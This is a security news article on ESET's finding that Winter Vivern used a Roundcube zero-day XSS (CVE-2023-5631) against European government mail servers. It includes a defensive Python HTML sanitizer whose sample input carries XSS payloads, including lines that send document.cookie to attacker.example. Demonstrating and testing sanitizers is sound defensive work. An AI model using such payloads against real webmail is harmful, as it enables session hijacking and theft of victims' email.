Winter Vivern: Zero-Day XSS exploit targets Roundcube servers


ESET Research has discovered that the Winter Vivern group exploited a zero-day cross-site scripting (XSS) vulnerability in the Roundcube webmail server.

The new campaign, described in an advisory published today, targeted the Roundcube webmail servers of government entities and a think tank in Europe. ESET Research reported the vulnerability to the Roundcube team on October 12; the team acknowledged and fixed it within days, releasing security updates on October 16 (Roundcube 1.6.4, 1.5.5 and 1.4.15 contain the fix).

Winter Vivern, a cyberespionage group known for targeting governments in Europe and Central Asia, has been active since at least 2020. To compromise its targets, the group uses a variety of methods, including malicious documents, phishing websites and a custom PowerShell backdoor. It is believed to be linked to MoustachedBouncer, a Belarus-aligned group.

Learn more about this threat: ESET unmasks cyberespionage group targeting embassies in Belarus

This isn't the first time Winter Vivern has targeted Roundcube servers: in 2022 the group exploited CVE-2020-35730, a vulnerability that Sednit (also known as APT28) has also exploited.

The newly exploited XSS vulnerability, CVE-2023-5631, can be triggered remotely by sending a specially crafted email message. At the time of the attacks even fully patched Roundcube instances were affected, because the flaw lies in rcube_washtml.php, the server-side script that sanitizes HTML messages before they are rendered in the user's browser.

By sending such an email, attackers can inject arbitrary JavaScript code into the victim's Roundcube session and use it to read and exfiltrate emails. ESET warns that Winter Vivern's ability to exploit a zero-day vulnerability in Roundcube is a concerning development in the field of cyberespionage.
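The defence that a bug like CVE-2023-5631 defeats is the server-side HTML "washer" that rewrites a message before the browser sees it. The following Python sanitizer is an added example written for this page; it is not Roundcube's code and does not reproduce the logic of rcube_washtml.php or the exact vector Winter Vivern used. It goes beyond the page's specifics by showing the general allowlist approach: only known-safe tags and attributes survive, event handlers and style are dropped implicitly, subtrees such as script and svg are discarded whole, and href/src values are checked by URL scheme so that javascript: and data: URLs (including entity-encoded and control-character-split spellings) never reach the page. The sample message and the attacker host are constructed for the demonstration.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags the sanitizer keeps. Anything else is dropped: tags in DROP_WITH_CONTENT
# lose their whole subtree, other unknown tags are removed but their text stays.
ALLOWED_TAGS = {
    "a", "b", "i", "u", "em", "strong", "p", "br", "div", "span", "ul", "ol",
    "li", "blockquote", "pre", "table", "thead", "tbody", "tr", "td", "th",
    "h1", "h2", "h3", "img", "hr",
}
DROP_WITH_CONTENT = {"script", "style", "svg", "math", "iframe", "object",
                     "embed", "template", "frame", "frameset", "noscript"}
VOID_TAGS = {"br", "img", "hr"}
# Per-tag attribute allowlist. Anything not listed is dropped, which removes
# every on* event handler and the style attribute without naming them.
ALLOWED_ATTRS = {
    "a": {"href", "title"},
    "img": {"src", "alt", "width", "height"},
    "td": {"colspan", "rowspan"},
    "th": {"colspan", "rowspan"},
}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}   # "" = relative URL
_CONTROL = re.compile(r"[\x00-\x20\x7f]")


def safe_url(value: str) -> bool:
    """True if the URL's scheme is on the allowlist (relative URLs pass)."""
    # Browsers ignore whitespace and control characters inside the scheme
    # ("java\tscript:"), so strip them before inspecting it. Entity forms such
    # as &#106;avascript: have already been decoded by HTMLParser.
    try:
        scheme = urlsplit(_CONTROL.sub("", value)).scheme.lower()
    except ValueError:          # e.g. malformed IPv6 literal: reject
        return False
    return scheme in SAFE_SCHEMES


class EmailHtmlSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip = 0          # > 0 while inside a DROP_WITH_CONTENT subtree

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._skip += 1
            return
        if self._skip or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in URL_ATTRS and not safe_url(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._skip = max(0, self._skip - 1)
            return
        if self._skip or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        pass                    # comments (incl. conditional comments) are dropped


def sanitize_email_html(raw: str) -> str:
    """Return a rendering-safe subset of an HTML email body."""
    parser = EmailHtmlSanitizer()
    parser.feed(raw)
    parser.close()
    return "".join(parser.out)


# Constructed sample message mixing legitimate content with four XSS attempts.
SAMPLE_EMAIL_HTML = """<div>
<p>Quarterly <b>report</b> attached.</p>
<a href="https://example.org/report">Download</a>
<a href="JaVaScRiPt:alert(document.cookie)">Open in viewer</a>
<img src="x" onerror="fetch('https://attacker.example/?c='+document.cookie)">
<svg xmlns="http://www.w3.org/2000/svg"><script>fetch('https://attacker.example/?c='+document.cookie)</script></svg>
<script>document.location='https://attacker.example/'</script>
</div>"""

if __name__ == "__main__":
    print(sanitize_email_html(SAMPLE_EMAIL_HTML))
```

The important design choice is that everything is an allowlist: a new tag, attribute or URL scheme the sanitizer has never heard of is rejected by default, so a gap in the sanitizer can only come from something explicitly allowed, which is the place to look when a washer such as rcube_washtml.php turns out to be bypassable.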

Winter Vivern has stepped up its operations by using a zero-day vulnerability in Roundcube. Previously it relied on known vulnerabilities in Roundcube and Zimbra for which proofs of concept are available online.

"Despite the low sophistication of the group's toolset, it poses a threat to European governments due to its persistence, its very regular phishing campaigns and the fact that a significant number of applications accessible on the Internet are not regularly updated, although they are known to contain vulnerabilities."
